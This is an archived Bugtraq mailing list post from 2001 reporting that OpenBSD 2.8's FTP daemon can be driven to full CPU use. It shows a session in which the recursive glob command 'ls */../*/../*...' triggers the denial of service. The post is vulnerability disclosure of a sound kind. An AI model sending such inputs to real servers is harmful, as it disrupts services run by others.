Bugtraq mailing list archives

Multiple vendors FTP denial of service

From: Peter Timothey Hessler <phessler () paychex com>
Date: Tue, 20 Mar 2001 08:38:31 -0800

OpenBSD 2.8 (from cd) goes to 100% CPU.  Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc shell is bash  relevant system info: Pentium 133
32Meg ram, 4Gig hard drive 100baseT nic.


Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>

After ftpd is using >90% CPU, I can still log-in and work like normal,
with a small noticeable delay.

--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500

Current thread:

Re: Multiple vendors FTP denial of service, (continued)
- - Re: Multiple vendors FTP denial of service Crist Clark (Mar 19)
- Re: Multiple vendors FTP denial of service JT (Mar 19)
- Re: Multiple vendors FTP denial of service D. J. Bernstein (Mar 19)
  - Re: Multiple vendors FTP denial of service jedi (Mar 20)
- Re: Multiple vendors FTP denial of service Pawel Wilk (Mar 20)
- Re: Multiple vendors FTP denial of service Interstellar Overdrive (Mar 23)
- Re: Multiple vendors FTP denial of service Stefan Laudat (Mar 21)
  - Re: Multiple vendors FTP denial of service Nate Eldredge (Mar 22)
  - Re: Multiple vendors FTP denial of service peterw (Mar 22)
  - Re: Multiple vendors FTP denial of service Markku Savela (Mar 22)
- Multiple vendors FTP denial of service Peter Timothey Hessler (Mar 21)